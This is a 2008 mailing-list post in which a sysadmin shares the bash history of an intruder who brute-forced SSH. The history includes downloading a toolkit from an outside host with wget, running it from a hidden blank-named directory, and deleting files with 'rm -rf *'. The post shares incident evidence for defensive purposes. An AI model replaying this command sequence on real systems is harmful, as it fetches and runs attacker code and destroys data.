[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]

[K12OSN] OT: Break-In report

From: Rob Owens <rob owens biochemfluidics com>
To: k12osn redhat com
Subject: [K12OSN] OT: Break-In report
Date: Wed, 02 Jan 2008 08:52:58 -0500

I thought you guys might be interested in seeing the tracks of acomputer break-in. I won't say whose system it was (to protect theembarassed), but the break-in was nothing but a brute-force ssh attemptat guessing usernames and passwords. A regular user account wascompromised and here is his bash history:

ls
cd who
ls
exit
w
cd /var/tmp
ls -a

cd "mkdir " "

cd " "
wget quest.dif.jp/x.tgz
tar zxvf x.tgz
cd x
./start dbdb
cd ..
ls -a
rm -rf *
passwd
ls -a
ps aux
ps aux | grep dan  (note: the hacked user account was "dan")
top
who
exit

I particularly like the use of " " as a directory name. Nice andinvisible. Also note that the invader put his files in two directorieswhich have the "sticky" bit set: /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunchof port-scanning. The OS is going to be re-installed anyway, just to besafe.

Are there any organizations out there that this should be reported to?(For instance, the way one might send reports to an antivirus group or acontent filtering group).


-Rob

Follow-Ups:
- Re: [K12OSN] OT: Break-In report
  - From: Les Mikesell

[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]